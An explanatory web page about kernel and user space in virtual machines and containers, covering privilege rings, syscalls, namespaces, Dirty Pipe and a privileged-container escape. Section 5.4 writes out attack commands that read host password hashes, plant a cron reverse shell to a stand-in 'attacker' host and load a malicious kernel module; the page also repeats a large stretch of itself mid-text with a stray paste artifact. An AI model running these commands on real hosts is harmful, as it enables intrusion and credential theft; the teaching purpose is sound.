Skip to content

Kernel Space and User Space in Virtualization and Containers

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.


Table of Contents

  1. Definitions
  2. How It Works in a Traditional OS
  3. Virtualization: VMs vs Containers
  4. Containers Deep Dive
  5. Practical Examples
  6. Comparison Table
  7. Further Reading
  8. Summary

1. Definitions

Kernel Space

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

  • All physical and virtual memory
  • All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
  • All hardware devices
  • Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.

Why the Separation Exists

The separation is a deliberate security and stability boundary:

Concern Without separation With separation
Stability A buggy app could corrupt kernel memory A crashing process is killed; kernel is unaffected
Security Any process could read any other process's memory Processes are isolated in separate virtual address spaces
Integrity Malicious code could overwrite interrupt handlers Kernel code is protected from unprivileged writes

The boundary is enforced by hardware — not just by software convention.


2. How It Works in a Traditional OS

CPU Privilege Rings

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

1
2
3
4
5
6
7
┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘
  • Ring 0 — the kernel runs here. Can execute any instruction.
  • Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │  1. Calls read(fd, buf, n) in libc
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │  3. Executes `syscall` instruction
  ────────────── privilege boundary ──────────────
       │  4. CPU switches to Ring 0, saves user state
       │  5. Kernel's syscall handler dispatches to sys_read()
       │  6. Kernel copies data from file into buf
       │  7. Returns to user space (Ring 3), restores state
User Process resumes with return value in rax

This transition — saving registers, switching privilege levels, executing kernel code, and returning — is a context switch between privilege domains. It costs on the order of hundreds of nanoseconds on modern hardware.

The Virtual Address Space

Each user-space process has its own virtual address space (typically 128 TiB on x86-64 Linux). The upper portion is mapped to kernel memory (but not accessible from Ring 3). This means the kernel is always "present" at known virtual addresses, but the hardware enforces that Ring 3 code cannot read or write to it.

Virtual Address Space of a single process:
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000 (on x86-64)
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000

3. Virtualization: VMs vs Containers

The kernel/user-space model becomes much more interesting in virtualized environments because there are now multiple operating systems involved, each with their own kernel and user space.

Virtual Machines (Full Virtualization)

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties: - Full kernel isolation — a kernel bug in VM1 does not affect VM2. - Syscalls stay within the guest kernel — they never reach the host kernel directly. - Higher overhead — each VM boots a full OS; memory footprint is in the GB range.

Containers (OS-Level Virtualization)

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties: - Shared kernel — all containers call into the same kernel. - Lower overhead — containers start in milliseconds; overhead is in the MB range. - Weaker isolation — the shared kernel is both the isolation mechanism and the attack surface.


4. Containers Deep Dive

The Linux Primitives: Namespaces and cgroups

Containers are not a single kernel feature — they are a composition of several:

Feature What it isolates
pid namespace Process ID space — PID 1 in a container is not the host's init
net namespace Network interfaces, routing tables, firewall rules
mnt namespace Mount points and filesystem hierarchy
uts namespace Hostname and NIS domain name
ipc namespace POSIX message queues, shared memory segments
user namespace UID/GID mappings (root in container ≠ root on host, optionally)
cgroup namespace View of cgroup hierarchy
[200~# Kernel Space and User Space in Virtualization and Containers

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.


Table of Contents

  1. Definitions
  2. How It Works in a Traditional OS
  3. Virtualization: VMs vs Containers
  4. Containers Deep Dive
  5. Practical Examples
  6. Comparison Table
  7. Further Reading
  8. Summary

1. Definitions

Kernel Space

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

  • All physical and virtual memory
  • All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
  • All hardware devices
  • Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.

Why the Separation Exists

The separation is a deliberate security and stability boundary:

Concern Without separation With separation
Stability A buggy app could corrupt kernel memory A crashing process is killed; kernel is unaffected
Security Any process could read any other process's memory Processes are isolated in separate virtual address spaces
Integrity Malicious code could overwrite interrupt handlers Kernel code is protected from unprivileged writes

The boundary is enforced by hardware — not just by software convention.


2. How It Works in a Traditional OS

CPU Privilege Rings

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

1
2
3
4
5
6
7
┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘
  • Ring 0 — the kernel runs here. Can execute any instruction.
  • Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │  1. Calls read(fd, buf, n) in libc
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │  3. Executes `syscall` instruction
  ────────────── privilege boundary ──────────────
       │  4. CPU switches to Ring 0, saves user state
       │  5. Kernel's syscall handler dispatches to sys_read()
       │  6. Kernel copies data from file into buf
       │  7. Returns to user space (Ring 3), restores state
User Process resumes with return value in rax

This transition — saving registers, switching privilege levels, executing kernel code, and returning — is a context switch between privilege domains. It costs on the order of hundreds of nanoseconds on modern hardware.

The Virtual Address Space

Each user-space process has its own virtual address space (typically 128 TiB on x86-64 Linux). The upper portion is mapped to kernel memory (but not accessible from Ring 3). This means the kernel is always "present" at known virtual addresses, but the hardware enforces that Ring 3 code cannot read or write to it.

Virtual Address Space of a single process:
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000 (on x86-64)
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000

3. Virtualization: VMs vs Containers

The kernel/user-space model becomes much more interesting in virtualized environments because there are now multiple operating systems involved, each with their own kernel and user space.

Virtual Machines (Full Virtualization)

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties: - Full kernel isolation — a kernel bug in VM1 does not affect VM2. - Syscalls stay within the guest kernel — they never reach the host kernel directly. - Higher overhead — each VM boots a full OS; memory footprint is in the GB range.

Containers (OS-Level Virtualization)

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties: - Shared kernel — all containers call into the same kernel. - Lower overhead — containers start in milliseconds; overhead is in the MB range. - Weaker isolation — the shared kernel is both the isolation mechanism and the attack surface.


4. Containers Deep Dive

The Linux Primitives: Namespaces and cgroups

Containers are not a single kernel feature — they are a composition of several:

Feature What it isolates
pid namespace Process ID space — PID 1 in a container is not the host's init
net namespace Network interfaces, routing tables, firewall rules
mnt namespace Mount points and filesystem hierarchy
uts namespace Hostname and NIS domain name
ipc namespace POSIX message queues, shared memory segments
user namespace UID/GID mappings (root in container ≠ root on host, optionally)
cgroup namespace View of cgroup hierarchy
cgroups v2 Resource limits: CPU, memory, I/O, PIDs

These namespaces give each container a virtualised view of the system, but all system calls still reach the same host kernel.

What Runs in User Space Per Container

Each container has its own isolated user space containing:

  • Root filesystem — typically an OCI image layer stack (e.g., alpine:3.19 + your app layer), mounted via overlayfs. This provides a private /bin, /lib, /etc, etc.
  • Processes — each container has its own PID namespace; the first process is PID 1 inside the container.
  • Librarieslibc, language runtimes, and dependencies come from the container image, not the host.
  • Environment — its own hostname, network interfaces, and mount tree.
Container A's user space:
/
├── bin/         ← from Alpine base image layer
├── lib/         ← libc from Alpine, NOT the host's libc
├── usr/
│   └── local/
│       └── bin/nginx   ← application layer
├── etc/
│   └── nginx/nginx.conf
├── proc/        ← virtualised via pid + mount namespace
└── sys/         ← virtualised

The kernel itself — at /proc/version, in kernel memory, in system call tables — is the host kernel and is identical for all containers.

How containerd Manages This

containerd is the industry-standard container runtime (used by Docker, Kubernetes, and others). Its role in the stack:

┌──────────────────────────────────┐
│  User (CLI / Kubernetes)         │
├──────────────────────────────────┤
│  containerd (container lifecycle │
│  management — image pull,        │
│  snapshot management, task API)  │
├──────────────────────────────────┤
│  runc (OCI runtime)              │
│  → calls clone(2) with CLONE_NEW*│
│    flags to create namespaces    │
│  → sets up cgroups, pivot_root   │
│  → execs container entrypoint    │
├──────────────────────────────────┤
│  Linux Kernel                    │
│  (namespaces, cgroups, overlayfs)│
└──────────────────────────────────┘

runc — the low-level OCI runtime — directly invokes syscalls like clone(2), unshare(2), pivot_root(2), and mount(2) to set up the container environment. It does not involve any virtual machine or hypervisor.

Isolation and Security Implications

Because every container shares the host kernel:

  1. There is no kernel isolation. A vulnerability in the kernel is exploitable by any container.
  2. Namespace escapes are possible. Misconfigured namespaces (e.g., a container with access to the host's pid namespace) break isolation entirely.
  3. Privileged containers are dangerous. Running a container with --privileged or excessive capabilities grants near-root access to the host.
  4. The syscall surface is the attack surface. Every syscall reachable from a container is a potential exploit path into the shared kernel.

Mitigation tools (seccomp, AppArmor/SELinux, user namespaces) reduce this surface but do not eliminate it.


5. Practical Examples

5.1 Architecture Diagram (Mermaid)

graph TD
    subgraph Host["Host Machine"]
        subgraph ContainerA["Container A (nginx)"]
            A_proc["PID 1: nginx\n(user space)"]
            A_fs["overlayfs root\n/bin, /lib, /etc/nginx"]
            A_net["veth0\n172.17.0.2/16"]
        end

        subgraph ContainerB["Container B (python app)"]
            B_proc["PID 1: python\n(user space)"]
            B_fs["overlayfs root\n/bin, /lib, /app"]
            B_net["veth1\n172.17.0.3/16"]
        end

        subgraph Kernel["Host Kernel (shared)"]
            NS["Namespaces\n(pid, net, mnt, uts, ipc)"]
            CG["cgroups v2\n(CPU, memory limits)"]
            SC["Syscall Table\nsys_read, sys_write, sys_socket…"]
            NET["Network Stack\niptables / nftables"]
            FS["VFS / overlayfs"]
        end

        A_proc -->|"syscall (e.g. read, write, socket)"| SC
        B_proc -->|"syscall (e.g. read, write, socket)"| SC
        SC --> NS
        SC --> CG
        SC --> NET
        SC --> FS
    end

5.2 A System Call from Inside a Container

Consider a Python process inside Container B calling socket.connect(). Here is the full path from container user space to the shared kernel:

Python (user space, inside container):

1
2
3
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("93.184.216.34", 80))  # example.com

What happens at the kernel boundary:

// libc translates socket() to the connect(2) syscall:
// rax = 42  (SYS_connect on x86-64)
// rdi = sockfd
// rsi = &sockaddr  { AF_INET, port=80, ip=93.184.216.34 }
// rdx = sizeof(sockaddr_in)
// → syscall instruction

// Inside the HOST kernel (sys_connect):
long sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) {
    struct socket *sock = sockfd_lookup_light(fd, ...);
    // sock->ops->connect() calls the TCP/IP stack
    // Uses the HOST kernel's network namespace for Container B
    // Routes through the host's veth pair and docker0 bridge
}

Key observation: the connect(2) syscall executes in the host kernel's network stack. The container's net namespace gives it an isolated view (its own routing table, its own eth0), but the code executing is the host kernel's TCP implementation — the same code serving Container A and the host itself.

5.3 Security Implication: Kernel Exploit Affects All Containers

Scenario: Dirty Pipe (CVE-2022-0847)

In February 2022, a vulnerability was disclosed in the Linux kernel's pipe subsystem (affects kernels 5.8–5.16.10). It allowed an unprivileged local user to overwrite arbitrary read-only files, including SUID binaries.

# Inside Container A (running as non-root UID 1000)
# The attacker has no special privileges inside the container.

# 1. Exploit overwrites /usr/bin/su inside the container's overlayfs —
#    but the kernel bug allows writing through to the underlying page cache.

# 2. Because the PAGE CACHE IS SHARED across all containers and the host,
#    the attacker can overwrite host files that happen to be mmap'd
#    or read by the kernel.

# 3. Result: privilege escalation to root ON THE HOST,
#    breaking out of Container A entirely.

Why this is different from a VM scenario:

In a VM, the guest kernel's pipe subsystem is isolated. CVE-2022-0847 in the guest kernel would give root inside the VM, but the hypervisor boundary would stop the exploit from reaching the host or other VMs. In a container environment, there is no such boundary — every container on the host was vulnerable until the host kernel was patched.

Mitigation layers (none are complete substitutes for patching):

# Example: seccomp profile blocking dangerous syscalls
# (Docker default profile, excerpt)
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "open", "close", "mmap", ...],
      "action": "SCMP_ACT_ALLOW"
    }
    # splice(2), the syscall central to Dirty Pipe, is allowed
    # by Docker's default profile — illustrating the difficulty
    # of blocking syscalls without breaking legitimate workloads.
  ]
}

5.4 Container Escape via Privileged Mode

Running a container with --privileged removes nearly all namespace isolation:

# On the host, a developer runs a "debug" container carelessly:
docker run --privileged -it ubuntu bash

# Inside the container, an attacker can:

# 1. Mount the host filesystem
mkdir /host
mount /dev/sda1 /host     # /dev/sda1 is visible because --privileged
                           # grants access to ALL host devices

# 2. Read and modify host files
cat /host/etc/shadow      # host password hashes
echo "* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1" \
  >> /host/etc/crontab    # plant a reverse shell

# 3. Load a kernel module (full kernel compromise)
insmod /malicious.ko      # arbitrary kernel code execution on the HOST

This escape works because --privileged grants CAP_SYS_ADMIN and disables seccomp/AppArmor, effectively giving the container access to the host kernel's full interface.


6. Comparison Table

Dimension Bare Metal Virtual Machine Container
Kernel Host kernel only Separate guest kernel per VM Shared host kernel
Isolation level None (single OS) Strong (hypervisor boundary) Moderate (namespace boundary)
Kernel sharing N/A No — each VM has its own Yes — all containers on host
Attack surface Full host Guest kernel + hypervisor API Host kernel syscall table
A kernel CVE affects… The host Only VMs running that kernel version All containers on the host
Startup time N/A Seconds to minutes Milliseconds
Memory overhead None ~512 MB – several GB per VM ~10–50 MB per container
Filesystem isolation None Full (virtual disk) overlayfs per container
Network isolation None Virtual NIC per VM net namespace per container
Syscall path Direct to kernel Guest kernel → hypervisor (vmcall/vmexit) Direct to host kernel (via namespace filter)
Root in environment = root on host? Yes No (root in guest ≠ host root) Potentially yes (without user namespaces)
Use case Max performance, single tenant Strong multi-tenant isolation High-density, microservices, CI
Examples Physical server KVM, VMware ESXi, Hyper-V Docker, containerd/runc, LXC, Podman

7. Further Reading

Linux Kernel and System Calls

Containers and Runtimes

Security

Tools

  • strace — trace syscalls made by a process (works inside containers)
  • nsenter — enter the namespaces of a running container
  • unshare — create new namespaces from the shell
  • Falco — runtime security; detects anomalous syscall behaviour in containers

8. Summary

The kernel/user-space boundary is a hardware-enforced privilege separation that underpins all OS security and stability. System calls are the only legal crossing point, governed by CPU rings and a controlled kernel ABI.

Virtual machines extend this model by running complete guest kernels inside a hypervisor, giving each VM its own isolated kernel. This means a kernel-level exploit in one VM stays within that VM.

Containers take a fundamentally different approach: they use Linux namespaces to create isolated views of a single running kernel, and cgroups to enforce resource limits. The kernel itself is shared. This makes containers fast and lightweight, but it means:

  • The kernel is the trust boundary — and it is shared by every container on the host.
  • A kernel vulnerability is a host-wide vulnerability — not scoped to a single container.
  • User space is fully isolated per container (filesystem, processes, network interfaces), but kernel space is not.

For most workloads, the container isolation model is acceptable when combined with defence-in-depth (seccomp profiles, AppArmor/SELinux policies, non-root users, minimal capabilities, image provenance). For high-security multi-tenant environments, consider gVisor (user-space kernel) or Kata Containers (lightweight VMs) to recover hardware-level isolation without sacrificing the container developer experience.


Page last updated: 2025. Kernel behaviour described targets Linux 5.15+ / 6.x LTS unless otherwise noted.